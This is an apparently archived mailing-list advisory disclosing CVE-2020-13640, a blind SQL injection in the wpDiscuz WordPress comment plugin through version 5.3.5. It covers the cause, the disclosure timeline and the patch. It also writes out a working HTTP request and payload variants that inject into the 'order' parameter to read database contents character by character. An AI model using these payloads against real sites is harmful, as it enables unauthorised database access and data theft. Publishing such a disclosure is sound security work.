Follow @Openwall on Twitter for new release announcements and other news
[<prev] [next>] [day] [month] [year] [list]
Date: Mon, 6 Jul 2020 02:13:39 +0300
From: asterite <>
Subject: CVE-2020-13640: WordPress Plugin wpDiscuz <= 5.3.5 SQL injection

There is an SQL injection in wpDiscuz plugin [1] version 5.3.5 and
earlier. This vulnerability is not present in 7.X version line. Plugin
vendor is gVectors [2]. The vulnerability can be exploited without

## Vulnerability Description ##

wpDiscuz is a plugin working with comments. It has an endpoint
"wpdLoadMoreComments" for fetching comments for post with given id. This
endpoint is vulnerable.

This is a boolean-based blind SQL-injection in parameter "order".
Injected payload gets into "ORDER BY" clause. Injected query output and
error message is not returned by the server, but attacker can use an
error-based binary oracle telling whether query succeeded or not: if
query fails with error, comment list in response will be empty,
otherwise it will contain comments for post which id is given in a
request. This means that, to exploit this vulnerability, an attacker
needs a post with at least one comment (but this is easily achievable
because usually sites have posts with comments and often commenting is
enabled for non-logged-in users).

### Example of request with an attack vector: ###

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: localhost
Content-Type: multipart/form-data;
Content-Length: 848
Origin: http://localhost
Connection: close

Content-Disposition: form-data; name="action"

Content-Disposition: form-data; name="offset"

Content-Disposition: form-data; name="orderBy"

Content-Disposition: form-data; name="order"

,  (select case when (ord(SUBSTRING((select SCHEMA_NAME from
information_schema.schemata limit 1), 1, 1)) = 105) then 1 else
1*(select table_name from information_schema.tables)end)=1  asc  #
Content-Disposition: form-data; name="postId"


here, injected query performs a test of character code of the first
letter of the name of the first database in MySQL. Usually it's
"information_schema", so the first letter is "i" (with code 105) and the
query will succeed and comments for the post will be in returned response.

An attacker could instead use vector
",  (select case when (ord(SUBSTRING((select SCHEMA_NAME from
information_schema.schemata limit 1), 1, 1)) = 106) then 1 else
1*(select table_name from information_schema.tables)end)=1  asc  #"
(double quotes for clarity) - in this query check would usually fail
(char code is compared with incorrect value 106, so, erroneous else
branch of 'case' will be executed) - so, comment list in response will
be empty.

(legitimate values of "order" parameter are "asc" and "desc")

## Exploit ##

PoC exploit can be found here:

## Cause ##

Regarding the cause of vulnerability: if I understood everything
correctly, the reason is that function "loadMoreComments()" in
class.WpdiscuzCore.php takes "_POST['order']" unsanitized and puts it to
"$args['order']", which, after several re-assignments into different
vars/properties, gets appended to "orderby" parameter in
"comments_clauses" hook [3] (in method "commentsClauses()" of
"WpdiscuzCore" class). If I got it right then values affected by
"comments_clauses" hook are put into SQL query (that fetches comments)
without further sanitization - so, it's dangerous to let unsanitized
user input get into them.

## Timeline (dd/mm/yyyy) ##

27/05/2020: Reported to vendor
27/05/2020: CVE assigned
29/05/2020: Reported to WordPress plugin team
29/05/2020: Got response from vendor
12/06/2020: Vendor publishes information about the vulnerability on
plugin site [4] and WP plugin page [5]
12/06/2020: Patched version in 5.X line (5.3.6) is released [6]

## References ##


Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.